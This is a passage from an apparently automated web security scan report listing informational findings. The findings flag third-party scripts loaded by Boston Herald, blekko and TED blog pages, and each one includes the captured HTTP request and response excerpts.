User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:07:29 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 1879
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Middle1"></script>
...[SNIP]...

18.19. http://bh.heraldinteractive.com/includes/processAds.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /includes/processAds.bg?position=Middle&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/sports/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:07:29 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 1885
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/sports/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Middle"></script>
...[SNIP]...

18.20. http://blekko.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blekko.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 19:44:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: fbl=2; path=/; expires=Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 12861
X-Blekko-PT: 8d9033cafbbd195c98d52cf7c67347d1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- NAV BOTTOM END-->
<script type="text/javascript" src="http://a.blekko-img.com/045/gz/c39f376862ddf44f_blekko20.js"></script>
...[SNIP]...

18.21. http://blekko.com/ws/radius+server  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/radius+server

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ws/radius+server HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=3; t=1316220316418

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 19:44:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: fbl=2; path=/; expires=Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 51563
X-Blekko-QF: hq
X-Blekko-PT: 799197a60f0e39dd460ab6add0d922af

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</div>
<script type="text/javascript" src="http://a.blekko-img.com/045/gz/c39f376862ddf44f_blekko20.js"></script>
...[SNIP]...

18.22. http://blog.ted.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.ted.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: blog.ted.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ted.com/webcast/archive/event/ibmwatson
Cookie: symfony=6rh1uq799n643l7plr6irjcis1; __utma=37353509.1316630564.1316220913.1316220913.1316220913.1; __utmb=37353509.1.10.1316220913; __utmc=37353509; __utmz=37353509.1316220913.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 19:54:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Last-Modified: Fri, 16 Sep 2011 19:51:03 +0000
Cache-Control: max-age=101, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://blog.ted.com/xmlrpc.php
Link: <http://wp.me/10512>; rel=shortlink
X-nananana: Batcache
Content-Length: 59882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<!--
   generate
...[SNIP]...
<meta name="google-site-verification" content="sFXF34UKTWvBRyEGnff_xySq7cKRc2-QorM8O8LdC5Q" />
       <script src='http://wordpress.com/remote-login.php?action=js&amp;host=blog.ted.com&amp;id=14795620&amp;t=1316202663&amp;back=blog.ted.com%2F%3F_%3D1316202663494' type="text/javascript"></script>
...[SNIP]...
<link rel='stylesheet' id='post-reactions-css' href='http://s2.wp.com/wp-content/mu-plugins/post-flair/style.css?m=1315610345g&#038;ver=3' type='text/css' media='all' />
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/jquery/jquery.js?m=1305826056g&amp;ver=1.6.1'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-content/themes/vip/tedconfblog/js/main.js?m=1300128116g&amp;ver=MU'></script>
...[SNIP]...
</a>
                               <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</a>
                               <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</a>
                               <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</a>
                               <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</a>
                               <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</a>
                               <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</a>
                               <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</a>
                               <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</a>
                               <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</a>
                               <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</div>
       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?z&#038;ver=MU'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1311367658g&amp;ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</noscript><script src="http://s.stats.wordpress.com/w.js?21" type="text/javascript"></script>
...[SNIP]...

18.23. http://bostonherald.com/entertainment/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /entertainment/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/ HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/national/?type=rem911
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhpopup=on; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.24.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1358113657.1316021626.1316021626.1316239316.2; __utmb=1.7.10.1316239316; __utmc=1; __utmz=1.1316239316.2.2.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:42:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 104417
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.24. http://bostonherald.com/news/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/ HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhpopup=on; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.18.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O2021J3t|O2021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=1.1358113657.1316021626.1316021626.1316239316.2; __utmb=1.5.10.1316239316; __utmc=1; __utmz=1.1316239316.2.2.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:31:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 102156
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.25. http://bostonherald.com/news/columnists/view.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/columnists/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/columnists/view.bg?articleid=1366212 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhpopup=on; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.6.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1358113657.1316021626.1316021626.1316239316.2; __utmb=1.1.10.1316239316; __utmc=1; __utmz=1.1316239316.2.2.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/; RMFD=011R4jGHO201yed8|O1021J78|O1021J7A|O1021J7F|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:15:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 54533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="http://ogp.me/ns#" xmln
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

   <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.26. http://bostonherald.com/news/national/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/national/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/national/?type=rem911 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhpopup=on; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.21.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=1.1358113657.1316021626.1316021626.1316239316.2; __utmb=1.6.10.1316239316; __utmc=1; __utmz=1.1316239316.2.2.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:31:58 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 61665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.27. http://bostonherald.com/news/regional/view.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/regional/view.bg?articleid=1366356&position=1 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 51603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="http://ogp.me/ns#" xmln
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

   <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.28. http://bostonherald.com/projects/your_tax_dollars.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /projects/your_tax_dollars.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/your_tax_dollars.bg?src=Mwra HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhpopup=on; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.27.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1358113657.1316021626.1316021626.1316239316.2; __utmb=1.8.10.1316239316; __utmc=1; __utmz=1.1316239316.2.2.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:44:48 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 34876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/event_simulate.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.29. http://bostonherald.com/track/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/ HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/projects/your_tax_dollars.bg?src=Mwra
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhpopup=on; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.29.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1358113657.1316021626.1316021626.1316239316.2; __utmb=1.9.10.1316239316; __utmc=1; __utmz=1.1316239316.2.2.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:06:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 76885
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
